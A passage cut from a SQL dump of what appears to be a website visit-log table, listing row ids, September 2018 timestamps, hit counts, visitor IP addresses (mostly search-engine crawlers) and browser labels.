04053,1,1,0,0,'178.154.244.29','other'),(306303,1537604074,1,1,0,0,'207.46.13.164','other'),(306304,1537604282,1,1,0,0,'54.36.148.221','other'),(306305,1537604774,1,1,0,0,'66.249.66.157','chrome'),(306306,1537604790,1,1,0,0,'54.36.149.57','other'),(306307,1537604976,1,1,0,0,'54.36.148.82','other'),(306308,1537605003,1,1,0,0,'54.36.148.186','other'),(306309,1537605678,1,1,0,0,'54.36.149.101','other'),(306310,1537606193,1,1,0,0,'54.36.149.30','other'),(306311,1537606340,1,1,0,0,'54.36.148.163','other'),(306312,1537606378,1,1,0,0,'8.29.198.27','other'),(306313,1537606514,1,1,0,0,'207.46.13.71','other'),(306314,1537606517,1,1,0,0,'216.244.66.241','other'),(306315,1537607559,1,1,0,0,'54.36.148.140','other'),(306316,1537607715,1,1,0,0,'54.36.149.39','other'),(306317,1537607797,1,1,0,0,'54.36.149.10','other'),(306318,1537607877,1,1,0,0,'54.36.148.237','other'),(306319,1537607901,1,1,0,0,'54.36.149.67','other'),(306320,1537608052,1,1,0,0,'54.36.149.15','other'),(306321,1537608442,1,1,0,0,'54.36.149.97','other'),(306322,1537608617,1,1,0,0,'54.36.148.217','other'),(306323,1537608692,1,1,0,0,'54.36.148.87','other'),(306324,1537609092,1,1,0,0,'54.36.148.244','other'),(306325,1537609199,1,1,0,0,'180.76.15.145','other'),(306326,1537609318,1,1,0,0,'54.36.148.101','other'),(306327,1537609542,1,1,0,0,'54.36.148.214','other'),(306328,1537609696,1,1,0,0,'54.36.148.138','other'),(306329,1537609829,1,1,0,0,'199.58.86.209','other'),(306330,1537610014,1,1,0,0,'54.36.148.49','other'),(306331,1537610333,1,1,0,0,'178.154.244.29','other'),(306332,1537610601,1,1,0,0,'54.36.148.176','other'),(306333,1537610640,1,1,0,0,'54.36.148.184','other'),(306334,1537610854,1,1,0,0,'54.36.148.74','other'),(306335,1537611412,1,1,0,0,'69.30.198.242','other'),(306336,1537611505,1,1,0,0,'66.249.66.157','chrome'),(306337,1537611886,1,1,0,0,'54.36.149.97','other'),(306338,1537611971,1,1,0,0,'207.46.13.164','other'),(306339,1537612193,1,1,0,0,'54.36.148.52','other'),(306340,1537612543,2,2,0,0,'54.36.148.149','other'),(306341,1537612797,1,1,0,0,'8.29.198.26','other'),(306342,1537612915,1,1,0,0,'8.29.198.25','other'),(306343,1537613349,1,1,0,0,'54.36.149.70','other'),(306344,1537613366,1,1,0,0,'54.36.149.73','other'),(306345,1537614119,1,1,0,0,'194.44.144.98','firefox'),(306346,1537614598,1,1,0,0,'54.165.59.7','other'),(306347,1537615077,1,1,0,0,'66.249.92.93','other'),(306348,1537615513,1,1,0,0,'172.245.244.50','firefox'),(306349,1537616033,1,1,0,0,'92.113.189.235','chrome'),(306350,1537616058,1,1,0,0,'54.36.148.126','other'),(306351,1537616100,1,1,0,0,'54.36.148.68','other'),(306352,1537616109,1,1,0,0,'54.36.148.204','other'),(306353,1537616545,1,1,0,0,'54.36.148.36','other'),(306354,1537616817,1,1,0,0,'54.36.148.232','other'),(306355,1537616929,1,1,0,0,'54.36.149.71','other'),(306356,1537616977,2,2,0,0,'54.36.148.33','other'),(306357,1537617200,1,1,0,0,'8.29.198.27','other'),(306358,1537617667,1,1,0,0,'54.36.148.246','other'),(306359,1537618194,1,1,0,0,'54.36.148.152','other'),(306360,1537618197,1,1,0,0,'54.36.148.41','other'),(306361,1537618286,2,2,0,0,'54.36.148.227','other'),(306362,1537618759,1,1,0,0,'66.249.66.155','chrome'),(306363,1537618775,1,1,0,0,'54.36.148.228','other'),(306364,1537619082,1,1,0,0,'54.36.148.156','other'),(306365,1537619340,1,1,0,0,'54.36.148.192','other'),(306366,1537619882,1,1,0,0,'54.36.149.39','other'),(306367,1537619886,1,1,0,0,'54.36.149.104','other'),(306368,1537619994,1,1,0,0,'54.36.148.147','other'),(306369,1537620089,1,1,0,0,'54.36.148.161','other'),(306370,1537620454,1,1,0,0,'54.36.148.245','other'),(306371,1537620461,1,1,0,0,'54.36.148.224','other'),(306372,1537620987,1,1,0,0,'54.165.59.7','other'),(306373,1537621379,2,2,0,0,'216.244.66.241','other'),(306374,1537621533,1,1,0,0,'54.36.148.163','other'),(306375,1537621749,1,1,0,0,'54.36.148.79','other'),(306376,1537621919,1,1,0,0,'54.36.149.25','other'),(306377,1537622108,1,1,0,0,'54.36.148.30','other'),(306378,1537622168,1,1,0,0,'77.51.61.20','chrome'),(306379,1537622331,1,1,0,0,'54.36.149.29','other'),(306380,1537622573,1,1,0,0,'54.36.148.33','other'),(306381,1537622628,1,1,0,0,'54.36.149.27','other'),(306382,1537622663,1,1,0,0,'54.36.148.47','other'),(306383,1537622959,2,2,0,0,'54.36.149.83','other'),(306384,1537623145,1,1,0,0,'54.36.149.86','other'),(306385,1537623147,1,1,0,0,'54.36.148.175','other'),(306386,1537623464,1,1,0,0,'54.36.149.67','other'),(306387,1537623618,1,1,0,0,'8.29.198.25','other'),(306388,1537623747,1,1,0,0,'8.29.198.26','other'),(306389,1537623834,1,1,0,0,'54.36.148.118','other'),(306390,1537624092,1,1,0,0,'54.36.149.88','other'),(306391,1537624128,1,1,0,0,'54.36.148.21','other'),(306392,1537624196,2,2,0,0,'216.244.66.241','other'),(306393,1537624210,1,1,0,0,'54.36.148.33','other'),(306394,1537624222,1,1,0,0,'54.36.148.171','other'),(306395,1537624435,1,1,0,0,'54.36.148.192','other'),(306396,1537624452,1,1,0,0,'54.36.149.44','other'),(306397,1537625360,1,1,0,0,'54.36.148.95','other'),(306398,1537625414,1,1,0,0,'54.36.148.134','other'),(306399,1537625475,1,1,0,0,'54.165.59.7','other'),(306400,1537626063,1,1,0,0,'207.46.13.164','other'),(306401,1537626347,1,1,0,0,'54.36.148.128','other'),(306402,1537626721,1,1,0,0,'54.36.148.217','other'),(306403,1537626800,1,1,0,0,'216.244.66.241','other'),(306404,1537627175,1,1,0,0,'66.249.66.61','chrome'),(306405,1537627686,1,1,0,0,'54.36.148.80','other'),(306406,1537628024,1,1,0,0,'8.29.198.27','other'),(306407,1537628367,1,1,0,0,'54.165.59.7','other'),(306408,1537628724,1,1,0,0,'207.46.13.164','other'),(306409,1537628965,1,1,0,0,'54.36.148.216','other'),(306410,1537628997,1,1,0,0,'54.36.149.106','other'),(306411,1537629425,1,1,0,0,'54.36.148.63','other'),(306412,1537629647,1,1,0,0,'54.36.148.227','other'),(306413,1537630127,1,1,0,0,'91.250.36.64','chrome'),(306414,1537630148,1,1,0,0,'54.36.148.250','other'),(306415,1537630889,1,1,0,0,'207.46.13.71','other'),(306416,1537631068,1,1,0,0,'54.36.149.11','other'),(306417,1537631085,1,1,0,0,'54.36.148.227','other'),(306418,1537631330,1,1,0,0,'54.36.148.12','other'),(306419,1537631478,1,1,0,0,'54.36.148.206','other'),(306420,1537631693,1,1,0,0,'54.36.148.161','other'),(306421,1537631698,1,1,0,0,'216.244.66.241','other'),(306422,1537631718,1,1,0,0,'54.36.148.244','other'),(306423,1537631890,1,1,0,0,'180.76.15.140','other'),(306424,1537632033,1,1,0,0,'66.249.66.155','chrome'),(306425,1537632064,1,1,0,0,'54.36.148.128','other'),(306426,1537632205,1,1,0,0,'54.36.148.171','other'),(306427,1537632223,1,1,0,0,'54.36.149.24','other'),(306428,1537632225,1,1,0,0,'66.102.9.38','chrome'),(306429,1537632279,1,1,0,0,'54.36.148.85','other'),(306430,1537633022,1,1,0,0,'54.36.149.91','other'),(306431,1537633078,2,2,0,0,'92.113.189.235','chrome'),(306432,1537633155,9,9,0,0,'207.46.13.164','other'),(306433,1537633164,7,7,0,0,'207.46.13.71','other'),(306434,1537633170,7,7,0,0,'157.55.39.181','other'),(306435,1537633177,3,3,0,0,'207.46.13.174','other'),(306436,1537633306,1,1,0,0,'54.36.148.156','other'),(306437,1537633789,1,1,0,0,'54.36.148.27','other'),(306438,1537633815,1,1,0,0,'54.36.149.21','other'),(306439,1537633831,1,1,0,0,'54.36.149.51','other'),(306440,1537634310,1,1,0,0,'54.36.149.89','other'),(306441,1537634442,1,1,0,0,'8.29.198.27','other'),(306442,1537634579,1,1,0,0,'8.29.198.25','other'),(306443,1537634859,1,1,0,0,'54.36.148.105','other'),(306444,1537635378,1,1,0,0,'54.36.148.111','other'),(306445,1537635392,1,1,0,0,'66.249.66.156','chrome'),(306446,1537636135,1,1,0,0,'54.36.148.21','other'),(306447,1537636982,1,1,0,0,'54.36.149.74','other'),(306448,1537637028,1,1,0,0,'180.76.15.144','other'),(306449,1537637056,1,1,0,0,'54.36.149.6','other'),(306450,1537637166,2,2,0,0,'216.244.66.241','other'),(306451,1537637994,1,1,0,0,'54.36.149.106','other'),(306452,1537638211,1,1,0,0,'54.36.148.184','other'),(306453,1537638858,1,1,0,0,'8.29.198.25','other'),(306454,1537639207,1,1,0,0,'54.36.149.7','other'),(306455,1537639248,1,1,0,0,'54.36.149.9','other'),(306456,1537639375,1,1,0,0,'54.36.149.90','other'),(306457,1537639755,2,2,0,0,'54.36.148.190','other'),(306458,1537640025,1,1,0,0,'54.36.148.184','other'),(306459,1537640503,1,1,0,0,'92.113.189.235','chrome'),(306460,1537640843,1,1,0,0,'54.36.148.161','other'),(306461,1537641048,1,1,0,0,'54.36.148.23','other'),(306462,1537641112,1,1,0,0,'54.36.148.211','other'),(306463,1537641115,1,1,0,0,'54.36.149.77','other'),(306464,1537641207,2,2,0,0,'54.36.149.11','other'),(306465,1537641338,1,1,0,0,'87.250.224.65','other'),(306466,1537641339,1,1,0,0,'37.9.113.103','other'),(306467,1537641621,2,2,0,0,'54.36.148.248','other'),(306468,1537641783,1,1,0,0,'54.36.148.217','other'),(306469,1537641855,1,1,0,0,'176.104.3.182','chrome'),(306470,1537641877,1,1,0,0,'5.45.207.79','other'),(306471,1537641895,1,1,0,0,'180.76.15.6','other'),(306472,1537641944,1,1,0,0,'207.46.13.164','other'),(306473,1537643017,1,1,0,0,'207.46.13.71','other'),(306474,1537643186,1,1,0,0,'54.36.149.34','other'),(306475,1537643218,1,1,0,0,'54.36.148.34','other'),(306476,1537643558,1,1,0,0,'54.36.148.209','other'),(306477,1537644612,1,1,0,0,'54.36.148.237','other'),(306478,1537644778,1,1,0,0,'91.209.11.236','other'),(306479,1537644875,1,1,0,0,'54.36.148.109','other'),(306480,1537644894,1,0,1,0,'66.249.66.155',''),(306481,1537645270,1,1,0,0,'8.29.198.25','other'),(306482,1537645325,1,1,0,0,'54.36.148.74','other'),(306483,1537645370,1,1,0,0,'54.36.148.212','other'),(306484,1537645413,1,1,0,0,'8.29.198.27','other'),(306485,1537645449,1,1,0,0,'54.36.149.48','other'),(306486,1537645523,1,1,0,0,'54.36.148.68','other'),(306487,1537645603,1,1,0,0,'54.36.148.151','other'),(306488,1537645677,1,1,0,0,'54.36.149.64','other'),(306489,1537645694,1,1,0,0,'54.36.148.37','other'),(306490,1537646167,1,1,0,0,'54.36.148.222','other'),(306491,1537646507,1,1,0,0,'54.36.149.96','other'),(306492,1537646763,1,1,0,0,'46.185.69.143','chrome'),(306493,1537647795,1,1,0,0,'54.36.148.117','other'),(306494,1537647976,1,1,0,0,'54.36.148.86','other'),(306495,1537648016,1,1,0,0,'54.36.149.0','other'),(306496,1537648020,1,1,0,0,'54.36.149.98','other'),(306497,1537648082,1,1,0,0,'54.36.149.84','other'),(306498,1537648129,1,1,0,0,'54.36.149.6','other'),(306499,1537648367,1,1,0,0,'54.36.148.98','other'),(306500,1537648574,1,1,0,0,'54.36.148.76','other'),(306501,1537648703,1,1,0,0,'54.36.149.33','other'),(306502,1537649132,1,1,0,0,'54.36.149.79','other'),(306503,1537649304,1,1,0,0,'54.36.148.224','other'),(306504,1537649647,1,1,0,0,'66.249.66.157','chrome'),(306505,1537649686,1,1,0,0,'8.29.198.25','other'),(306506,1537649816,1,1,0,0,'54.36.148.136','other'),(306507,1537650515,1,1,0,0,'54.36.149.22','other'),(306508,1537650610,1,1,0,0,'157.55.39.181','other'),(306509,1537650782,1,1,0,0,'54.36.149.30','other'),(306510,1537650809,1,1,0,0,'54.36.148.100','other'),(306511,1537651605,1,1,0,0,'54.36.149.71','other'),(306512,1537651666,1,1,0,0,'54.36.148.17','other'),(306513,1537652143,1,1,0,0,'54.36.148.178','other'),(306514,1537652255,1,1,0,0,'54.36.148.10','other'),(306515,1537652850,1,1,0,0,'54.36.148.124','other'),(306516,1537653189,7,7,0,0,'178.154.244.29','other'),(306517,1537653447,1,1,0,0,'54.36.149.54','other'),(306518,1537653531,1,1,0,0,'5.45.207.79','other'),(306519,1537653582,1,1,0,0,'216.244.66.241','other'),(306520,1537653745,4,4,0,0,'178.154.244.11','other'),(306521,1537653793,1,1,0,0,'54.36.148.14','other'),(306522,1537653822,1,1,0,0,'54.36.148.137','other'),(306523,1537654181,1,1,0,0,'54.36.148.176','other'),(306524,1537654233,1,1,0,0,'54.36.148.222','other'),(306525,1537654240,6,6,0,0,'178.154.244.29','other'),(306526,1537654319,1,1,0,0,'13.66.139.0','other'),(306527,1537654468,1,1,0,0,'54.36.149.63','other'),(306528,1537654534,1,1,0,0,'54.36.148.205','other'),(306529,1537654641,2,2,0,0,'5.45.207.79','other'),(306530,1537654659,1,1,0,0,'54.36.149.18','other'),(306531,1537654718,1,1,0,0,'178.154.244.11','other'),(306532,1537654759,1,1,0,0,'54.36.148.25','other'),(306533,1537655271,1,1,0,0,'54.36.148.227','other'),(306534,1537655344,1,1,0,0,'54.36.149.93','other'),(306535,1537655362,1,1,0,0,'54.36.148.197','other'),(306536,1537655417,1,1,0,0,'54.36.148.163','other'),(306537,1537655676,1,1,0,0,'54.36.148.176','other'),(306538,1537655677,1,1,0,0,'5.45.207.79','other'),(306539,1537655678,3,3,0,0,'178.154.244.29','other'),(306540,1537655816,1,1,0,0,'95.163.255.119','other'),(306541,1537655841,1,1,0,0,'95.163.255.103','other'),(306542,1537656059,1,1,0,0,'54.36.148.253','other'),(306543,1537656090,1,1,0,0,'8.29.198.27','other'),(306544,1537656132,1,1,0,0,'54.36.149.41','other'),(306545,1537656223,1,1,0,0,'54.36.149.11','other'),(306546,1537656246,1,1,0,0,'95.163.255.116','other'),(306547,1537656249,1,1,0,0,'8.29.198.26','other'),(306548,1537656255,1,1,0,0,'66.249.66.155','chrome'),(306549,1537656335,1,1,0,0,'54.36.149.81','other'),(306550,1537656336,1,1,0,0,'54.36.148.60','other'),(306551,1537656343,1,1,0,0,'95.163.255.104','other'),(306552,1537656899,1,1,0,0,'54.36.148.80','other'),(306553,1537657144,1,1,0,0,'54.36.148.19','other'),(306554,1537657304,1,1,0,0,'54.36.149.85','other'),(306555,1537657680,2,2,0,0,'178.154.244.11','other'),(306556,1537657843,1,1,0,0,'178.154.244.29','other'),(306557,1537657932,1,1,0,0,'207.46.13.174','other'),(306558,1537658690,1,1,0,0,'54.36.148.174','other'),(306559,1537658965,1,1,0,0,'54.36.148.177','other'),(306560,1537659578,1,1,0,0,'54.36.149.27','other'),(306561,1537659852,1,1,0,0,'54.36.149.5','other'),(306562,1537660497,1,1,0,0,'54.36.149.37','other'),(306563,1537660516,1,1,0,0,'8.29.198.26','other'),(306564,1537660915,1,1,0,0,'66.249.66.157','chrome'),(306565,1537661442,1,1,0,0,'216.244.66.241','other'),(306566,1537661890,1,1,0,0,'54.36.148.175','other'),(306567,1537661896,1,1,0,0,'54.36.148.85','other'),(306568,1537661946,1,1,0,0,'54.36.148.234','other'),(306569,1537662638,2,2,0,0,'216.244.66.241','other'),(306570,1537662910,1,1,0,0,'54.36.149.107','other'),(306571,1537664146,2,2,0,0,'216.244.66.241','other'),(306572,1537664993,1,1,0,0,'54.36.148.86','other'),(306573,1537665051,1,1,0,0,'178.154.244.49','other'),(306574,1537665191,1,1,0,0,'54.36.148.153','other'),(306575,1537665352,1,1,0,0,'54.36.149.76','other'),(306576,1537665443,1,1,0,0,'54.36.149.105','other'),(306577,1537665815,1,1,0,0,'54.36.149.3','other'),(306578,1537666012,1,1,0,0,'54.36.149.65','other'),(306579,1537666181,1,1,0,0,'54.36.148.80','other'),(306580,1537666315,2,2,0,0,'54.36.148.164','other'),(306581,1537666363,1,1,0,0,'54.36.148.128','other'),(306582,1537666634,1,1,0,0,'54.36.148.211','other'),(306583,1537666858,1,1,0,0,'54.36.149.49','other'),(306584,1537666867,1,1,0,0,'54.36.148.51','other'),(306585,1537666908,2,2,0,0,'8.29.198.25','other'),(306586,1537667026,1,1,0,0,'54.36.148.53','other'),(306587,1537667206,1,1,0,0,'54.36.148.24','other'),(306588,1537667448,1,1,0,0,'54.36.148.177','other'),(306589,1537667581,1,1,0,0,'54.36.148.201','other'),(306590,1537667619,1,1,0,0,'54.36.148.152','other'),(306591,1537667743,1,1,0,0,'52.41.211.72','chrome'),(306592,1537668045,1,1,0,0,'141.8.142.38','other'),(306593,1537668278,1,1,0,0,'54.36.148.24','other'),(306594,1537668582,1,0,1,0,'66.249.66.156',''),(306595,1537668591,1,1,0,0,'54.36.148.122','other'),(306596,1537668903,1,1,0,0,'54.36.149.42','other'),(306597,1537668955,1,1,0,0,'52.37.211.217','chrome'),(306598,1537669265,1,1,0,0,'207.46.13.71','other'),(306599,1537669268,1,1,0,0,'216.244.66.241','other'),(306600,1537669271,1,1,0,0,'54.36.149.0','other'),(306601,1537669568,1,1,0,0,'54.36.149.65','other'),(306602,1537670164,1,1,0,0,'95.108.181.94','other'),(306603,1537670171,1,1,0,0,'141.8.183.23','other'),(306604,1537670175,1,1,0,0,'87.250.224.107','other'),(306605,1537670207,1,1,0,0,'95.108.213.50','other'),(306606,1537670210,1,1,0,0,'213.180.203.23','other'),(306607,1537670237,1,1,0,0,'54.36.148.107','other'),(306608,1537670360,1,1,0,0,'54.36.148.219','other'),(306609,1537670417,1,1,0,0,'54.36.149.69','other'),(306610,1537670587,1,1,0,0,'54.36.149.44','other'),(306611,1537670610,1,1,0,0,'54.36.149.27','other'),(306612,1537670612,1,1,0,0,'54.36.148.72','other'),(306613,1537670756,1,1,0,0,'54.36.148.86','other'),(306614,1537670776,1,1,0,0,'54.36.148.12','other'),(306615,1537671141,1,1,0,0,'54.36.149.26','other'),(306616,1537671347,1,1,0,0,'8.29.198.25','other'),(306617,1537671683,1,1,0,0,'54.36.148.189','other'),(306618,1537671715,1,1,0,0,'54.36.149.79','other'),(306619,1537671854,1,1,0,0,'54.36.148.102','other'),(306620,1537671925,1,1,0,0,'54.36.148.116','other'),(306621,1537672089,1,1,0,0,'54.36.148.196','other'),(306622,1537672739,1,1,0,0,'54.36.148.37','other'),(306623,1537673083,1,1,0,0,'54.36.148.81','other'),(306624,1537673146,1,1,0,0,'54.36.148.87','other'),(306625,1537674203,1,1,0,0,'66.249.66.157','chrome'),(306626,1537674425,1,1,0,0,'54.36.148.43','other'),(306627,1537674956,1,1,0,0,'54.36.148.109','other'),(306628,1537675055,1,1,0,0,'54.36.148.132','other'),(306629,1537675298,1,1,0,0,'54.36.148.85','other'),(306630,1537675395,1,1,0,0,'54.36.148.121','other'),(306631,1537676292,2,2,0,0,'95.213.141.126','opera'),(306632,1537676511,1,1,0,0,'54.36.148.85','other'),(306633,1537676740,1,1,0,0,'54.36.148.82','other'),(306634,1537677063,1,1,0,0,'178.154.244.11','other'),(306635,1537677077,1,1,0,0,'54.36.149.86','other'),(306636,1537677242,4,4,0,0,'178.154.244.29','other'),(306637,1537677709,1,1,0,0,'54.36.148.20','other'),(306638,1537677732,1,1,0,0,'54.36.148.159','other'),(306639,1537677737,2,2,0,0,'8.29.198.27','other'),(306640,1537677750,1,1,0,0,'95.108.213.4','other'),(306641,1537678153,2,2,0,0,'178.154.244.29','other'),(306642,1537678318,1,1,0,0,'54.36.148.143','other'),(306643,1537678728,1,1,0,0,'54.36.149.33','other'),(306644,1537679158,1,1,0,0,'54.36.148.232','other'),(306645,1537679300,1,1,0,0,'54.36.149.4','other'),(306646,1537679426,1,1,0,0,'54.36.148.174','other'),(306647,1537679482,1,1,0,0,'54.36.148.35','other'),(306648,1537679860,1,1,0,0,'54.36.148.140','other'),(306649,1537680207,1,1,0,0,'54.36.148.33','other'),(306650,1537680669,10,10,0,0,'178.154.244.11','other'),(306651,1537680685,1,1,0,0,'54.36.149.89','other'),(306652,1537680690,15,15,0,0,'178.154.244.29','other'),(306653,1537680698,4,4,0,0,'5.45.207.79','other'),(306654,1537680774,1,1,0,0,'52.53.201.78','chrome'),(306655,1537681334,1,1,0,0,'54.36.149.15','other'),(306656,1537681979,1,1,0,0,'54.36.148.58','other'),(306657,1537682175,1,1,0,0,'8.29.198.25','other'),(306658,1537682328,1,1,0,0,'54.36.148.237','other'),(306659,1537682450,1,1,0,0,'207.46.13.164','other'),(306660,1537682567,1,1,0,0,'54.36.148.86','other'),(306661,1537682842,1,1,0,0,'54.36.149.88','other'),(306662,1537682898,1,1,0,0,'54.36.148.85','other'),(306663,1537682998,1,1,0,0,'5.45.207.79','other'),(306664,1537683224,1,0,1,0,'66.249.66.61',''),(306665,1537683231,1,0,1,0,'66.249.66.57',''),(306666,1537683306,1,1,0,0,'141.8.142.103','other'),(306667,1537683516,1,1,0,0,'54.36.148.170','other'),(306668,1537683523,1,1,0,0,'54.36.149.9','other'),(306669,1537683717,1,1,0,0,'54.36.148.116','other'),(306670,1537683722,1,1,0,0,'54.36.148.33','other'),(306671,1537684063,1,1,0,0,'54.36.148.59','other'),(306672,1537684202,1,1,0,0,'178.154.244.11','other'),(306673,1537684368,3,3,0,0,'178.154.244.29','other'),(306674,1537685161,1,1,0,0,'54.36.149.15','other'),(306675,1537685166,1,1,0,0,'66.249.66.155','chrome'),(306676,1537685341,1,1,0,0,'54.36.148.83','other'),(306677,1537685394,5,5,0,0,'178.154.244.29','other'),(306678,1537685405,1,1,0,0,'54.36.149.8','other'),(306679,1537685482,4,4,0,0,'178.154.244.11','other'),(306680,1537685637,1,1,0,0,'5.45.207.79','other'),(306681,1537685701,1,1,0,0,'54.36.148.255','other'),(306682,1537685762,1,1,0,0,'141.8.142.108','other'),(306683,1537685768,1,1,0,0,'54.36.148.178','other'),(306684,1537685842,1,1,0,0,'54.36.149.24','other'),(306685,1537686139,1,1,0,0,'54.36.148.235','other'),(306686,1537686400,1,1,0,0,'54.36.148.146','other'),(306687,1537686439,1,1,0,0,'178.154.244.29','other'),(306688,1537686445,1,1,0,0,'178.154.244.11','other'),(306689,1537686750,1,1,0,0,'54.36.148.125','other'),(306690,1537686781,1,1,0,0,'54.36.149.92','other'),(306691,1537686929,1,1,0,0,'207.46.13.164','other'),(306692,1537686979,1,1,0,0,'54.36.148.92','other'),(306693,1537687737,1,1,0,0,'54.36.148.63','other'),(306694,1537687810,2,2,0,0,'216.244.66.241','other'),(306695,1537688512,1,1,0,0,'54.36.148.103','other'),(306696,1537688559,1,1,0,0,'8.29.198.26','other'),(306697,1537688581,1,1,0,0,'35.202.99.105','other'),(306698,1537688656,1,1,0,0,'54.36.148.132','other'),(306699,1537688750,1,1,0,0,'8.29.198.25','other'),(306700,1537689472,1,1,0,0,'5.9.158.195','other'),(306701,1537690074,1,1,0,0,'54.36.148.233','other'),(306702,1537690393,1,1,0,0,'54.36.148.29','other'),(306703,1537690508,1,1,0,0,'54.36.148.154','other'),(306704,1537691630,1,1,0,0,'185.200.62.15','chrome'),(306705,1537691731,1,1,0,0,'178.154.244.29','other'),(306706,1537691802,1,1,0,0,'54.36.148.46','other'),(306707,1537691908,1,1,0,0,'54.36.148.209','other'),(306708,1537691963,1,1,0,0,'54.36.148.202','other'),(306709,1537692010,1,1,0,0,'216.244.66.241','other'),(306710,1537692077,1,1,0,0,'54.36.148.253','other'),(306711,1537692099,1,1,0,0,'54.36.148.37','other'),(306712,1537692420,1,1,0,0,'199.58.86.211','other'),(306713,1537692647,1,1,0,0,'54.36.148.226','other'),(306714,1537692798,1,1,0,0,'54.36.148.131','other'),(306715,1537692852,1,1,0,0,'66.249.66.59','chrome'),(306716,1537692996,1,1,0,0,'8.29.198.25','other'),(306717,1537693040,1,1,0,0,'95.108.181.83','other'),(306718,1537693345,1,1,0,0,'51.255.65.46','other'),(306719,1537693348,1,1,0,0,'216.244.66.241','other'),(306720,1537693515,1,1,0,0,'54.36.148.111','other'),(306721,1537693686,1,1,0,0,'54.36.148.151','other'),(306722,1537693904,1,1,0,0,'54.36.149.88','other'),(306723,1537693919,1,1,0,0,'66.249.66.156','chrome'),(306724,1537694021,1,1,0,0,'54.36.149.93','other'),(306725,1537694024,1,1,0,0,'54.36.149.40','other'),(306726,1537694418,1,1,0,0,'78.111.185.37','chrome'),(306727,1537694683,1,1,0,0,'54.36.149.36','other'),(306728,1537694904,1,1,0,0,'54.36.148.192','other'),(306729,1537694970,1,1,0,0,'54.36.149.31','other'),(306730,1537695156,1,1,0,0,'54.36.149.73','other'),(306731,1537695174,1,1,0,0,'54.36.148.53','other'),(306732,1537695274,1,1,0,0,'213.180.203.40','other'),(306733,1537695337,1,1,0,0,'54.36.148.138','other'),(306734,1537695408,2,2,0,0,'216.244.66.241','other'),(306735,1537696454,1,1,0,0,'40.77.169.26','other'),(306736,1537696531,1,1,0,0,'54.36.149.83','other'),(306737,1537696778,1,1,0,0,'148.251.9.145','other'),(306738,1537697086,1,1,0,0,'54.36.148.74','other'),(306739,1537697369,1,1,0,0,'54.36.148.41','other'),(306740,1537697399,18,18,0,0,'54.80.219.236','other'),(306741,1537697823,2,2,0,0,'54.36.148.114','other'),(306742,1537698241,1,1,0,0,'54.36.149.83','other'),(306743,1537698564,1,1,0,0,'54.36.148.199','other'),(306744,1537698608,1,1,0,0,'54.36.149.19','other'),(306745,1537698648,7,7,0,0,'54.80.219.236','other'),(306746,1537698697,1,1,0,0,'54.36.148.138','other'),(306747,1537698841,1,1,0,0,'54.36.148.230','other'),(306748,1537699110,1,1,0,0,'54.36.149.6','other'),(306749,1537699375,1,1,0,0,'8.29.198.27','other'),(306750,1537699537,1,1,0,0,'54.36.148.28','other'),(306751,1537699579,1,1,0,0,'8.29.198.26','other'),(306752,1537699595,6,6,0,0,'54.80.219.236','other'),(306753,1537699891,1,1,0,0,'66.249.66.155','chrome'),(306754,1537700106,1,1,0,0,'66.249.66.156','chrome'),(306755,1537700544,1,1,0,0,'54.36.149.57','other'),(306756,1537700590,1,1,0,0,'66.249.66.59','chrome'),(306757,1537700865,1,1,0,0,'54.36.148.61','other'),(306758,1537700981,1,1,0,0,'54.36.148.190','other'),(306759,1537700985,1,1,0,0,'54.36.148.225','other'),(306760,1537701382,5,5,0,0,'54.80.219.236','other'),(306761,1537701479,1,1,0,0,'54.36.149.106','other'),(306762,1537701609,1,1,0,0,'54.36.148.85','other'),(306763,1537701910,1,1,0,0,'207.46.13.71','other'),(306764,1537702393,1,1,0,0,'54.36.148.62','other'),(306765,1537702644,1,1,0,0,'54.36.148.183','other'),(306766,1537702915,1,1,0,0,'35.202.99.105','other'),(306767,1537703028,1,1,0,0,'54.36.148.64','other'),(306768,1537703059,2,2,0,0,'69.30.213.202','other'),(306769,1537703248,1,1,0,0,'216.244.66.241','other'),(306770,1537703319,1,1,0,0,'54.36.148.59','other'),(306771,1537703490,1,1,0,0,'54.36.149.105','other'),(306772,1537703654,1,1,0,0,'54.36.149.75','other'),(306773,1537703665,1,1,0,0,'66.249.66.59','chrome'),(306774,1537703833,1,1,0,0,'66.249.66.155','chrome'),(306775,1537703845,1,1,0,0,'8.29.198.27','other'),(306776,1537704009,1,1,0,0,'54.36.149.7','other'),(306777,1537704017,1,1,0,0,'54.36.148.119','other'),(306778,1537704213,1,1,0,0,'54.36.148.46','other'),(306779,1537704220,1,1,0,0,'54.36.148.28','other'),(306780,1537704518,1,0,1,0,'66.249.66.156',''),(306781,1537704537,1,1,0,0,'54.36.148.70','other'),(306782,1537705039,1,1,0,0,'54.36.149.32','other'),(306783,1537705315,1,1,0,0,'54.36.148.39','other'),(306784,1537705354,1,1,0,0,'54.36.148.153','other'),(306785,1537705400,1,1,0,0,'54.36.148.53','other'),(306786,1537705699,1,1,0,0,'216.244.66.241','other'),(306787,1537705969,3,3,0,0,'178.154.244.29','other'),(306788,1537705979,1,1,0,0,'5.45.207.79','other'),(306789,1537706194,1,1,0,0,'54.36.149.83','other'),(306790,1537706339,1,1,0,0,'54.36.148.14','other'),(306791,1537706666,1,1,0,0,'54.36.148.252','other'),(306792,1537706799,1,1,0,0,'54.36.148.115','other'),(306793,1537706937,1,1,0,0,'54.36.148.209','other'),(306794,1537707536,1,1,0,0,'54.36.148.35','other'),(306795,1537707746,1,1,0,0,'54.36.149.18','other'),(306796,1537708064,1,1,0,0,'54.36.148.216','other'),(306797,1537708670,1,1,0,0,'54.36.148.207','other'),(306798,1537708753,1,1,0,0,'207.46.13.174','other'),(306799,1537708781,1,0,1,0,'66.249.66.156',''),(306800,1537708823,1,1,0,0,'54.36.148.132','other'),(306801,1537709807,1,1,0,0,'5.9.70.72','other'),(306802,1537710038,1,1,0,0,'54.36.148.79','other'),(306803,1537710197,1,1,0,0,'8.29.198.26','other'),(306804,1537710301,1,1,0,0,'54.36.148.163','other'),(306805,1537710303,1,1,0,0,'54.36.148.184','other'),(306806,1537710410,1,1,0,0,'8.29.198.27','other'),(306807,1537710652,1,1,0,0,'54.36.148.223','other'),(306808,1537710719,1,1,0,0,'54.36.148.222','other'),(306809,1537710845,1,1,0,0,'216.244.66.241','other'),(306810,1537711084,1,1,0,0,'54.36.149.7','other'),(306811,1537711372,1,1,0,0,'54.36.148.200','other'),(306812,1537711545,1,1,0,0,'54.36.148.168','other'),(306813,1537711665,1,1,0,0,'54.36.148.50','other'),(306814,1537711670,1,1,0,0,'54.36.148.226','other'),(306815,1537711776,1,1,0,0,'54.36.148.55','other'),(306816,1537711884,1,1,0,0,'54.36.149.22','other'),(306817,1537711927,1